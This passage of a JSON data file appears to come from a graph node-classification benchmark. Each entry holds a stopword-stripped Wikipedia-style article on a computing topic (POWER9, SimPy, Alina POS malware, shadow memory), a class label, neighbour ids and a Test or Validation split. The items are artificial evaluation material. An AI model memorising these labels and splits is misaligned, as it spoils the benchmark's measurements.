must introduced concurrent object shared object data structure helps concurrent processes communicate reach agreement two main methods design concurrent object traditionally designers use critical section solve problem means one process allowed visit concurrent object time others must wait process exits critical section method straightforward easy implement however systems critical sections face risk crashing process dies inside critical section sleeps intolerably long time another implementation concurrent object called wait-free implementation guarantee consensus finite number steps given kind object powerful enough solve consensus problems maurice herlihy gave impossibility universality hierarchy consensus number hierarchy means maximum number processes system reach consensus given object objects higher consensus number implemented objects lower consensus number according hierarchy read/write registers solve consensus even 2-process-system data structure like stack queue solve consensus two processes ca n't objects solve consensus among processes efficient way prove take advantage bivalence assume output binary state bivalent two outputs possible output reachable state 0/1 state called 0-valent/1-valent basic idea make contradiction executing operations get state 0-valent 1-valent however concurrent objects universal means solve consensus among number processes simulate objects way simulate objects universal objects build operations sequence concurrent object",
    "neighbors": [
      3713,
      8706,
      9859,
      1669,
      6406,
      7315,
      1049,
      9753,
      4380,
      9248,
      545,
      7085,
      4280,
      1087,
      8640,
      4423,
      7499,
      8916,
      8025,
      4827,
      1908,
      121,
      764,
      3326
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11613,
    "label": 3,
    "text": "POWER9:power9 power9 family superscalar multithreading symmetric multiprocessors based power isa announced august 2016 hot chips conference power9-based processors manufactured using 14 nm finfet process 12- 24-core versions scale scale applications possibly variations since power9 architecture open licensing modification openpower foundation members current fastest supercomputer world summit based power9 also using nvidia volta gpus accelerators power9 core comes two variants four-way multithreaded one called smt4 eight-way one called smt8 smt4- smt8-cores similar consist number so-called slices fed common schedulers slice rudimentary 64-bit single-threaded processing core load store unit lsu integer unit alu vector scalar unit vsu simd floating point super-slice combination two slices smt4-core consists 32 kb l1 cache 32 kb l1 data cache instruction fetch unit ifu instruction sequencing unit isu feeds two super-slices smt8-core two sets l1 caches ifus isus feed four super-slices result 12-core 24-core versions power9 consist number slices 96 amount l1 cache power9 core whether smt4 smt8 12-stage pipeline five stages shorter predecessor power8 aims retain clock frequency around 4 ghz first incorporate elements power isa v.3.0 released december 2015 including vsx-3 instructions power9 design made modular used processor variants used licensing different fabrication process ibm chip co-processors compression cryptography well large low-latency edram l3 cache power9 variants ship versions cores disabled due yield reasons raptor computing systems first sold 4-core chips even ibm initially sold ac922 systems 22-core chips even though types chips 24 cores dies lot facilities on-chip helping massive off-chip i/o performance power9 chips made two types cores scale scale configuration power9 cores either smt4 smt8 smt8 cores intended powervm systems smt4 cores intended powernv systems use powervm predominantly run linux power9 chips made scale support directly-attached memory scale chips intended use machines two cpu sockets use buffered memory ibm portal openpower lists three available modules nimbus chip although scale-out smt8 variant powervm also uses lagrange module/socket sforza modules use land grid array 2601-pin socket talos ii – two-socket workstation/server platform using power9 smt4 sforza processors available 2u server 4u server tower eatx mainboard marketed secure owner-controllable free open-source software firmware initially shipping 4-core 8-core 18-core 22-core chip options chips cores available talos ii lite – single-socket version talos ii mainboard made using pcb blackbird – single-socket microatx platform using smt4 sforza processors 4–8 cores 2 ram slots supporting 256gib total barreleye g2 zaius – two-socket server platform using lagrange processors barreleye g2 zaius chassis use zaius power9 motherboard power systems ac922 – 2u 2× power9 smt4 monza 6× nvidia volta gpus 2× capi 2.0 attached accelerators 1 tb ddr4 ram ac abbreviation accelerated computing system also known witherspoon newell power systems l922 – 2u 1–2× power9 smt8 8–12 cores per processor 4 tb ddr4 ram powervm running linux power systems s914 – 4u 1× power9 smt8 4–8 cores 1 tb ddr4 ram powervm running aix/ibm i/linux power systems s922 – 2u 1–2× power9 smt8 4–10 cores per processor 4 tb ddr4 ram powervm running aix/ibm i/linux power systems s924 – 4u 2× power9 smt8 8–12 cores per processor 4 tb ddr4 ram powervm running aix/ibm i/linux power systems h922 – 2u 1–2× power9 smt8 4–10 cores per processor 4 tb ddr4 ram powervm running sap hana linux aix/ibm 25 system power systems h924 – 4u 2× power9 smt8 8–12 cores per processor 4 tb ddr4 ram powervm running sap hana linux aix/ibm 25 system power systems e950 – 4u 2–4× power9 smt8 8–12 cores per processor 16 tb buffered ddr4 ram power systems e980 – 1–4× 4u 4–16× power9 smt8 8–12 cores per processor 64 tb buffered ddr4 ram magna pe2112gtx – 2u two-socket server high performance computing using lagrange processors manufactured wistron summit sierra united states department energy together oak ridge national laboratory lawrence livermore national laboratory contracted ibm nvidia build two supercomputers summit sierra based power9 processors coupled nvidia volta gpus systems slated go online 2017 sierra based ibm power systems ac922 compute node first racks summit delivered oak ridge national laboratory 31 july 2017 marenostrum 4 – one three clusters emerging technologies block fourth marenostrum supercomputer power9 cluster nvidia volta gpus cluster expected provide 1.5 petaflops computing capacity installed emerging technologies block marenostrum 4 exists test new developments might suitable future versions marenostrum predecessor power9 supported freebsd ibm aix ibm linux running without powervm implementation power9 support linux kernel began version 4.6 march 2016 rhel suse debian gnu/linux centos supported",
    "neighbors": [
      6914,
      3203,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      3472,
      4881,
      5393,
      7065,
      1563,
      1309,
      1823,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      7218,
      10675,
      823,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      336,
      8530,
      3540,
      342,
      2135,
      9302,
      2010,
      731,
      6878,
      8058,
      1635,
      869,
      10214,
      10985,
      1260,
      10734,
      1776,
      3185,
      4211,
      5235,
      8700,
      7802,
      3323,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 11614,
    "label": 6,
    "text": "Zipeg:zipeg zipeg open source free software extracts files compressed archives like zip rar 7z others rarely used types zipeg works mac os x windows best known file preview ability incapable compressing files although able extract compressed ones zipeg built top 7-zip backend ui implemented java open source zipeg automatically detects filenames national alphabets code pages correctly translates unicode zipeg reads exif thumbnails jpeg digital photographs uses tool tip style preview item icons",
    "neighbors": [
      6022,
      1801,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      5677,
      7983,
      950,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 11615,
    "label": 9,
    "text": "SimPy:simpy simpy process-based discrete-event simulation framework based standard python event dispatcher based python ’ generators also used asynchronous networking implement multi-agent systems simulated real communication processes simpy simple python generator functions used model active components like customers vehicles agents simpy also provides various types shared resources model limited capacity congestion points like servers checkout counters tunnels version 3.1 also provide monitoring capabilities aid gathering statistics resources processes simulations performed “ fast possible ” real time wall clock time manually stepping events though theoretically possible continuous simulations simpy features carry however simpy overkill simulations fixed step size processes ’ interact shared resources — use simple codice_1 loop case simpy distribution contains tutorials in-depth documentation large number examples simpy released open source software mit license first version released december 2002 one simpy main goals easy use example simple simpy simulation clock process prints current simulation time step",
    "neighbors": [
      8554,
      5612,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11616,
    "label": 2,
    "text": "Microsoft_Sync_Framework:microsoft sync framework microsoft sync framework data synchronization platform microsoft used synchronize data across multiple data stores sync framework includes transport-agnostic architecture data store-specific synchronization providers modelled ado.net data provider api plugged sync framework used offline access data working cached set data submitting changes master database batch well synchronize changes data source across consumers publish/subscribe sync peer-to-peer synchronization multiple data sources sync framework features built-in capabilities conflict detection – whether data changed already updated – flag manual inspection use defined policies try resolve conflict sync services includes embedded sql server compact database store metadata synchronization relationships well sync attempt sync framework api surfaced managed code use .net framework applications well unmanaged code use com applications scheduled ship visual studio 2008 late november 2007 sync framework runtime provides synchronization functionality without tied data store data transport protocols providing data source specific synchronization providers data source supported example using proper synchronization providers files synchronized across computers project updates synchronized across project participants media synchronized across devices sync framework ships three providers microsoft sync services ado.net sync services file systems sync services sse sync services used synchronize devices supplying providers device similarly pim software microsoft office outlook media libraries windows media player also supported providing suitable providers providers used enumerate items data store identified item id addition also maintain synchronization metadata state data store changes enumerated quickly metadata maintained every instance data store replica provider attached metadata maintained includes replica id tick count representing progression time conflict log tombstone log set changes data store seen knowledge replica id tick count pair makes codice_1 encodes state data store time sync framework defines set operation codice_2 object replica codice_3 determines store contains specified change codice_4 merge two knowledge sets codice_5 project knowledge subset items codice_6 create new knowledge set without changes subset items metadata managed metadata storage service uses in-process sql server compact database store metadata per-provider basis sync services api operates creating synchronization session represented codice_7 object synchronization session synchronizes data across two synchronization providers one source data store destination instances providers passed codice_7 object synchronization session destination provider sends knowledge set store source provider compares knowledge destination change set source enumerate changes transfer destination destination provider makes sure changes conflicting merges changes updates knowledge microsoft sync services ado.net synchronization provider synchronizing across databases using ado.net ado.net datasets synchronized source destination persisted database server also support data sources relational database like xml database web service long proxy provided abstract data source data provider available proxy sync services ado.net provider intended use offline applications data central database cached locally application works cached data changes uploaded batch addition provider also used collaborative applications application work local dataset synchronized periodically peer-to-peer manner participants locally datasets stored either using sql server compact database database server supporting ado.net sync services ado.net allows incremental change tracking allows changes replicated rather replicating entire copy sync services file systems provider used synchronize two file system locations either local folders network shares addition mirroring new files changes existing files also synchronized changes files detected using timestamps optionally hashing file contents conflicting changes file detected set automatically resolved conflicting updates file newer edit kept file deleted one replica updated another update take precedence delete two files different content created name across two replicas sync operation one created later persisted rename operation caused files get name retained renaming one deletes configured move file recycle bin recovered necessary sync services file systems provider also provides preview mode enumerates actions taken sync operation without actually performing operations view letting users review changes made synchronization performed peer-to-peer manner neither sync framework sync services file systems provider perform authentication accessing files authentication job application using sync framework api files transferred without encryption use encryption transit custom providers uses encrypted tcp connection needs used sync services file systems provider also supports static filters exclude files based wildcards attributes first release however sync services file systems provider sync either ntfs security descriptors alternate data streams sync services feedsync provider used help synchronize replicas creating feedsync enabled feed either rss atom formats subscribed interested parties provider also used extract items feedsync feed merge changes back data store sync services feedsync uses another provider connect data store sync services feedsync provides services used help synchronize data replica rss atom feeds replica particular repository information synchronized using feedsync producer service synchronization application work synchronization provider create list items replica put rss atom xml stream items published interested subscribers similarly feedsync consumer service helps synchronization application take input rss atom xml stream extract items use synchronization provider apply appropriate changes replica sync framework underlies exchange feed items two feeds cross-subscribed easily synchronized one another peers synchronization community synchronization community set replicas keep data synchronized microsoft sync framework free windows windows mobile devices support platforms available commercial licensing porting kits",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      9286,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      7409,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      10020,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      2943,
      9609,
      9612,
      2959,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      8640,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 11617,
    "label": 3,
    "text": "List_of_CIL_instructions:list cil instructions list instructions instruction set common intermediate language bytecode",
    "neighbors": [
      5952,
      11559,
      10953,
      6411,
      11212,
      372,
      3573,
      3736,
      3705,
      10684
    ],
    "mask": "Test"
  },
  {
    "node_id": 11618,
    "label": 7,
    "text": "Message_passing_in_computer_clusters:message passing computer clusters message passing inherent element computer clusters computer clusters ranging homemade beowulfs fastest supercomputers world rely message passing coordinate activities many nodes encompass message passing computer clusters built commodity servers switches used virtually every internet service recently use computer clusters one thousand nodes spreading number nodes cluster increases rapid growth complexity communication subsystem makes message passing delays interconnect serious performance issue execution parallel programs specific tools may used simulate visualize understand performance message passing computer clusters large computer cluster assembled trace-based simulator use small number nodes help predict performance message passing larger configurations following test runs small number nodes simulator reads execution message transfer log files simulates performance messaging subsystem many messages exchanged much larger number nodes historically two typical approaches communication cluster nodes pvm parallel virtual machine mpi message passing interface however mpi emerged de facto standard message passing computer clusters pvm predates mpi developed oak ridge national laboratory around 1989 provides set software libraries allow computing node act parallel virtual machine provides run-time environment message-passing task resource management fault notification must directly installed every cluster node pvm used user programs written c c++ fortran etc unlike pvm concrete implementation mpi specification rather specific set libraries specification emerged early 1990 discussions 40 organizations initial effort supported arpa national science foundation design mpi drew various features available commercial systems time mpi specifications gave rise specific implementations mpi implementations typically use tcp/ip socket connections mpi widely available communications model enables parallel programs written languages c fortran python etc mpi specification implemented systems mpich open mpi computer clusters use number strategies dealing distribution processing multiple nodes resulting communication overhead computer clusters tianhe-i use different processors message passing used performing computations tiahnhe-i uses two thousand feiteng-1000 processors enhance operation proprietary message passing system computations performed xeon nvidia tesla processors one approach reducing communication overhead use local neighborhoods also called locales specific tasks computational tasks assigned specific neighborhoods cluster increase efficiency using processors closer however given many cases actual topology computer cluster nodes interconnections may known application developers attempting fine tune performance application program level quite difficult given mpi emerged de facto standard computer clusters increase number cluster nodes resulted continued research improve efficiency scalability mpi libraries efforts included research reduce memory footprint mpi libraries earliest days mpi provided facilities performance profiling via pmpi profiling system use pmipi- prefix allows observation entry exit points messages however given high level nature profile type information provides glimpse real behavior communication system need information resulted development mpi-peruse system peruse provides detailed profile enabling applications gain access state-changes within mpi-library achieved registering callbacks peruse invoking triggers message events take place peruse work paraver visualization system paraver two components trace component visual component analyze traces statistics related specific events etc large scale often supercomputer level parallel system developed essential able experiment multiple configurations simulate performance number approaches modeling message passing efficiency scenario ranging analytical models trace-based simulation approaches rely use test environments based artificial communications perform synthetic tests message passing performance systems bigsim provide facilities allowing simulation performance various node topologies message passing scheduling strategies analytical level necessary model communication time term set subcomponents startup latency asymptotic bandwidth number processors well known model hockney model simply relies point point communication using l r message size l startup latency r asymptotic bandwidth mb/s xu hwang generalized hockney model include number processors latency asymptotic bandwidth functions number processors gunawan cai generalized introducing cache size separated messages based sizes obtaining two separate models one messages cache size one specific tools may used simulate understand performance message passing computer clusters instance clustersim uses java-based visual environment discrete-event simulation approach computed nodes network topology visually modeled jobs duration complexity represented specific probability distributions allowing various parallel job scheduling algorithms proposed experimented communication overhead mpi message passing thus simulated better understood context large-scale parallel job execution simulation tools include mpi-sim bigsim mpi-sim execution-driven simulator requires c c++ programs operate clustersim hand uses hybrid higher-level modeling system independent programming language used program execution unlike mpi-sim bigsim trace-driven system simulates based logs executions saved files separate emulator program bigsim includes emulator simulator emulator executes applications small number nodes stores results simulator use simulate activities much larger number nodes emulator stores information sequential execution blocks sebs multiple processors log files seb recording messages sent sources destinations dependencies timings etc simulator reads log files simulates may star additional messages also stored sebs simulator thus provide view performance large applications based execution traces provided emulator much smaller number nodes entire machine available configured",
    "neighbors": [
      785,
      7699,
      7963,
      1823,
      6815,
      2339,
      5029,
      5798,
      9126,
      6184,
      2345,
      11049,
      4909,
      2045,
      7218,
      8501,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      330,
      1866,
      8523,
      4308,
      3927,
      344,
      2264,
      731,
      2140,
      3677,
      11487,
      4194,
      5090,
      7142,
      8554,
      10483,
      3960,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11619,
    "label": 4,
    "text": "Strong_customer_authentication:strong customer authentication strong customer authentication sca requirement eu revised directive payment services psd2 payment service providers within european economic area sca requirement comes force 14 september 2019 requirement ensures electronic payments performed multi-factor authentication increase security electronic payments physical card transactions already commonly could termed strong customer authentication eu chip contactless pin generally true internet transactions across eu prior implementation requirement article 97 1 directive requires payment service providers use strong customer authentication payer accesses payment account online br b initiates electronic payment transaction br c carries action remote channel may imply risk payment fraud abuses directive defines strong customer authentication essentially two-factor authentication article 4 30 authentication based use two elements categorised knowledge something user knows possession something user possesses inherence something user independent breach one compromise reliability others designed way protect confidentiality authentication data multiple ways card provider implement sca including 31 january 2013 european central bank ecb issued recommendations internet payment security requiring strong customer authentication ecb requirements technologically neutral order foster innovation competition public submission process ecb identified three solutions strong customer authentication two based reliance authentication new variant 3-d secure incorporates one-time passwords subsequently european commission drafted proposals updated payment services directive including requirement became psd2 psd2 strong customer authentication legal requirement electronic payments credit cards starting september 14 2019 2016 visa criticised proposal making strong customer authentication mandatory grounds could make online payments difficult thus hurt sales online retailers reserve bank india mandates strong authentication online transactions proposal make 3d secure mandatory australia blocked australian competition consumer commission accc numerous objections flaw-related submissions received",
    "neighbors": [
      6220,
      4965,
      11244
    ],
    "mask": "Test"
  },
  {
    "node_id": 11620,
    "label": 1,
    "text": "Precedence_graph:precedence graph precedence graph also named conflict graph serializability graph used context concurrency control databases precedence graph schedule contains precedence graph schedule 3 transactions cycle length 2 two edges committed transactions t1 t2 schedule history conflict serializable notice commit transaction 2 meaning regarding creation precedence graph algorithm test conflict serializability schedule along example schedule formula_10 formula_11 formula_4 formula_5 formula_6 formula_7 formula_8 formula_9",
    "neighbors": [
      3398,
      11377,
      5330,
      2901,
      7446,
      7581
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11621,
    "label": 4,
    "text": "Alina_(malware):alina malware alina point sale malware pos ram scraper used cybercriminals scrape credit card debit card information point sale system first started scrape information late 2012 resembles jackpos malware executed gets installed user computer checks updates update found removes existing alina code installs latest version new installations adds file path autostart runkey maintain persistence finally adds java.exe appdata directory executes using parameter codice_1 new installations codice_2 upgrades alina inspects user processes help windows api calls alina maintains blacklist processes process information blacklist uses openprocess read process contents memory dump data scraped alina sends c c servers using http post command hardcoded binary",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      9233,
      8978,
      4863,
      4883,
      278,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      1970,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      4165,
      10309,
      6091,
      2508,
      6360,
      7515,
      4344,
      3941,
      107,
      877,
      3571,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 11622,
    "label": 4,
    "text": "K7_Total_Security:k7 total security k7 total security developed k7 computing pvt ltd. malware prevention antivirus software provides malware prevention removal subscription period uses signatures heuristics identify viruses features include software firewall e-mail spam filtering phishing protection k7 computing distributes product download box copy oem software k7 computing pvt ltd. software hardware security company founded 1991 jayaraman kesavardhanan chennai india company 90+ employees chennai hq employees around world software research virus detection handled virus lab chennai k7 computing member avar association anti virus asia researchers jayaraman kesavardhanan founder cto k7 computing granted best member award recognition significant contributions avar year 2008 chennai tn 16 december 2008 k7 computing cloud computing division built windows platform k7 cloud solutions formed result k7 computing acquisition binarykarma chennai india based start-up working products area virtualization management j. kesavardhanan serves founder chief technology officer k7 computing developing antivirus software 20 years recognized antivirus software k7 computing k7 total security av-comparatives performance test 2010 version 11 released february 2011 together k7 ultimate security 11 antivirus plus antivirus premium 15 june 2011 k7 released business edition antivirus security k7 enterprise security business orientated antivirus product offering remote management installation home users smartphone users small offices enterprise edition products cloud products see k7 cloud solutions k7 total security released 2002 k7 computing first security suite windows pcs service time offered basic protection internet users anti-virus anti-spyware tools anti-spam basic firewall k7 total security 10 best performing antivirus 2010 av-comparatives well 2011 k7 antivirus plus november 2011 vb-100 award received december 2011 august 2012",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      6797,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      7983,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      8024,
      8998,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      11225,
      9569,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11623,
    "label": 3,
    "text": "Computer_fan_control:computer fan control fan control management rotational speed electric fan computers various types computer fans used provide adequate cooling different fan control mechanisms balance cooling capacities noise generate commonly accomplished motherboards hardware monitoring circuitry configured end-user bios software perform fan control modern pcs grow powerful requirements electrical power computers convert part electrical power heat generated major components heat production varies system load periods compute-intensive activity generate much heat idle time processors early x86-based computers early 486s need active ventilation power supplies needed forced cooling power supply fans also circulated cooling air rest pc atx standard byproduct increased heat generation fan need move increasing amounts air thus need powerful since must move air area space fans become noisy fans installed pc case produce noise levels 70 db since fan noise increases fifth power fan rotation speed reducing rotations per minute rpm small amount potentially means large reduction fan noise must done cautiously excessive reduction speed may cause components overheat damaged done properly fan noise drastically reduced common cooling fans used computers use standardized connectors two four pins first two pins always used deliver power fan motor rest optional depending fan design type color wires connected pins varies depending number connectors role pin standardized guaranteed system cooling fans equipped either two- three-pin connectors usually designed accept wide range input voltages directly affects rotation speed blades style fan control fan either temperature inside chassis checked outside-of-range temperature detected fans set maximum speed temperature drops threshold fans turned back control method reduces noise issues power requirements periods low usage system operating capacity fan noise become problem standard cooling fan essentially bladed dc motor varying voltage input across acceptable range fan speed fan increase added voltage decrease reduced voltage faster fan means air moved thus higher heat exchange rate ways perform regulation described resistors series fan power pin simplest method reducing fan noise add heat generated inside computer case since voltage drop proportional current fan may start need appropriate power rating variable fan control potentiometers could used along transistor mosfet whose output voltage controlled potentiometer possible use rheostat instead diode series fan reduce voltage output fan silicon diode provides relatively constant voltage drop 0.7 v per diode data sheets specific diode specify voltage drop example 1n4001 silicon diode voltage drop varies approximately 0.7 0.9 v current varies 0.01 1 power rating noted diodes may require cooling operate rated current also noted voltage drop across diode fall temperature causing fan speed like series regulators diode dissipate power equal voltage drop times current passing voltage computer cooling fan receives defined difference voltage wire +12 v ground wire +0 v connecting one wires different voltage voltage fan receives different default 12 v fan designed increasing voltage default 12 v achieved e.g connecting −12 v −5 v power line instead ground wire fan connector connecting 5 v power line +12 v input fan connector procedure 10 17 24 v voltages achieved voltages exceeding 12 v potentially damaging computer fans rated 12 v. however combination modern power supplies longer required provide −5 v power line limited power delivery capability −12 v line usually less 1 power reduces total capacity volt modded fans modern systems safest method volt modding connecting +5 v power line +12 v input fan reduces voltage fan receives +5 v. fans work low voltage fans may run +5 v started rotating reasonable speed another method reducing fan speed moving 5 v wire classical molex power connector place ground wire going fan thereby delivering +7 v 12 v − 5 v 7 v fan however potentially risky method +5 v psu line intended source current sink psu likely get damaged case load 5 v psu line load generated 7 v fans e.g pc enters idle/sleep state also components inside computer using +5 v power might exposed 5 v case short circuit fan common voltage regulator ics like popular lm78xx series sometimes used provide variable constant voltage fans thermally bonded computer chassis one ics provide 1 current voltage 6 8 9 10 v lm7806 lm7808 lm7809 lm7810 respectively adjustable versions like popular lm317 also exist combined potentiometer adjustable regulators allow user vary fan speed several fans currents far excess standard potentiometer could handle higher currents discrete linear regulators relatively simple construct using power transistor mosfet small signal transistor zener diode voltage reference discrete regulators require additional components minimum two transistors three resistors small capacitor allow arbitrarily high currents allowing regulation additional fans accessories linear regulators waste heat produced roughly pulse-width modulation pwm common method controlling computer fans pwm-capable fan usually connected 4-pin connector pinout ground +12 v sense control sense pin used relay rotation speed fan control pin open-drain open-collector output requires pull-up 5 v 3.3 v fan unlike linear voltage regulation fan voltage proportional speed fan driven constant supply voltage speed control performed fan based control signal control signal square wave operating 25 khz duty cycle determining fan speed 25khz used raise sound signal range human hearing use lower frequency could produce audible hum whine typically fan driven 30 100 rated fan speed using signal 100 duty cycle exact speed behavior linear threshold value minimum speed threshold low control levels manufacturer dependent many motherboards feature firmware software regulates fans based processor computer case temperatures another method popular gamers manual fan speed controller mounted expansion slot 5.25 3.5 drive bay come built computer case using switches knobs attached fans speeds adjusted one methods modern motherboards feature hardware monitoring chips capable performing fan control usually pwm method described chips configured bios using specialised software operating system booted processors produce varying levels heat depending system load thus makes sense reduce speed fans idle decrease noise produced fans running full speed load goes point fan speed must adjusted promptly avoid overheating modern hardware monitor chips configured capable independently running monitoring loop without need functioning bios operating system automatic control offered chips may called thermal cruise mode maintaining thermal envelope well fan speed cruise mode maintaining specific fan speed automatically however software capable accessing advanced configuration parameters provided chips common generic software implements basic interfacing chips namely explicit setting duty cycle fan control setting subsequently performing duty cycle adjustments software thus requiring operating system well third-party software continue running main cpu perform monitoring loop may problem system utility crashes point system may overheat due failure fans maintain adequate cooling whilst running reduced voltage speed method software physically controls fan usually pwm see many companies provide software control fan speeds motherboards microsoft windows mac os x/macos also third-party programs work variety motherboards allow wide customization fan behavior depending temperature readings motherboard cpu gpu sensors well allowing manual control two programs speedfan argus monitor",
    "neighbors": [
      10337,
      1637,
      3304,
      1515,
      6797,
      4270,
      2415,
      7151,
      10102,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11624,
    "label": 2,
    "text": "Shadow_memory:shadow memory shadow memory technique used track store information computer memory used program execution shadow memory consists shadow bytes map individual bits one bytes main memory shadow bytes typically invisible original program used record information original piece data technique utilized memory-error checkers store information parts memory allocated program checked shadow memory used detecting reporting incorrect accesses memory even though program may crashing due segmentation fault similar error checker may also store additional information memory bits defined ones memcheck part valgrind suite uses detect undefined behavior resulting acting printing undefined memory values use shadow memory however limited memory-error checkers information stored shadow bytes fixed instance used threadsanitizer data race detector shadow memory implemented used lot different ways different performance characteristics memcheck instance tracks values bit precision addresssanitizer part clang compiler comparatively fast memcheck like valgrind tools uses binary translation instrumentation run code manipulating shadow memory corresponding program memory use addresssanitizer hand created compile-time inserts error-checking code inline program compilation shadow-memory implementation uses huge reservation virtual memory shadow memory giving different performance characteristics",
    "neighbors": [
      7941,
      2383,
      815,
      4695,
      11644,
      10333
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11625,
    "label": 9,
    "text": "Programming_language_implementation:programming language implementation programming language implementation system executing computer programs two general approaches programming language implementation notice compiler directly execute program ultimately order execute program via compilation must translated form serve input interpreter directly hardware piece computer hardware interpret programming language directly language called machine code so-called native code compiler one compiles program machine code actual compilation often separated multiple passes like code generation often assembler language translator generating native code linking loading execution compiler given high level language produces another high level language called translator source source translation often useful add extensions existing languages exploit good portable implementation language example c simplifying development many combinations interpretation compilation possible many modern programming language implementations include elements example smalltalk programming language conventionally implemented compilation bytecode either interpreted compiled virtual machine popular ways use jit aot compiler compilation implementation strategy copied many languages since smalltalk pioneered every programming language requires abstract machines bridge gap high level language low level real machine",
    "neighbors": [
      10752,
      515,
      7684,
      11269,
      6664,
      9224,
      9229,
      2062,
      7695,
      9231,
      10771,
      9749,
      8728,
      4633,
      4121,
      3613,
      9245,
      8226,
      2599,
      5165,
      5677,
      5679,
      564,
      2105,
      2617,
      3132,
      6717,
      8771,
      7237,
      7749,
      8262,
      10824,
      1099,
      1611,
      1613,
      9299,
      6228,
      1112,
      603,
      3675,
      6753,
      9825,
      7267,
      8293,
      1130,
      2666,
      9323,
      2670,
      623,
      9330,
      5751,
      6775,
      7805,
      5760,
      7308,
      2191,
      9877,
      8854,
      1178,
      667,
      6137,
      159,
      9376,
      4777,
      5803,
      10413,
      2225,
      1203,
      692,
      4277,
      7355,
      7867,
      4799,
      7880,
      8908,
      205,
      2774,
      5336,
      10463,
      7392,
      7904,
      11488,
      11490,
      8421,
      10470,
      5360,
      5361,
      8435,
      4341,
      3830,
      6906,
      7421,
      256,
      11010,
      3334,
      6919,
      7430,
      9993,
      1301,
      8987,
      10012,
      3869,
      2335,
      5409,
      11555,
      3876,
      7462,
      7980,
      4398,
      10547,
      11255,
      311,
      4921,
      5945,
      9019,
      1852,
      3904,
      3910,
      10569,
      9034,
      8524,
      847,
      3414,
      9050,
      1883,
      11099,
      11610,
      862,
      1379,
      10083,
      6502,
      10089,
      8554,
      5997,
      10097,
      3446,
      3960,
      8057,
      11132,
      4992,
      3462,
      7562,
      10649,
      1435,
      2972,
      4507,
      6556,
      6047,
      1952,
      6558,
      7580,
      8609,
      4516,
      11683,
      5031,
      9128,
      11688,
      428,
      10668,
      8628,
      6074,
      10683,
      5567,
      5569,
      6594,
      8644,
      4550,
      11208,
      2505,
      3529,
      5578,
      3022,
      7630,
      11218,
      10198,
      5079,
      2519,
      10712,
      3034,
      2012,
      2013,
      7646,
      6629,
      7144,
      3051,
      9714,
      10228,
      502,
      8695,
      505,
      6652,
      2045,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 11626,
    "label": 3,
    "text": "Sun_Blade:sun blade sun blade line blade server computer systems sold sun microsystems 2006 onwards june 2006 sun announced amd opteron-based sun blade 8000 modular blade server system sun blade 8000 chassis hold 10 sun blade x8420 x8440 modules following year sun blade 6000 system launched allowed mixed ultrasparc x64 x86-64 architecture blades sun blade t6300 t6320 modules run solaris use ultrasparc t1 ultrasparc t2 processors respectively sun blade x6220 x6250 modules use amd opteron intel xeon 5000-series processors respectively x-series blades support solaris oracle linux rhel sles windows server vmware",
    "neighbors": [
      3328,
      9090,
      9731,
      1801,
      6153,
      4235,
      1809,
      4241,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      1316,
      10789,
      1707,
      2731,
      5677,
      3247,
      6322,
      2871,
      4664,
      4285,
      6464,
      7104,
      6338,
      9665,
      10436,
      3911,
      1480,
      8007,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      6107,
      2269,
      5471,
      4960,
      9955,
      11363,
      7270,
      5356,
      7148,
      7022,
      5872,
      5233,
      8179,
      11636,
      9333,
      631,
      11129,
      1788,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 11627,
    "label": 3,
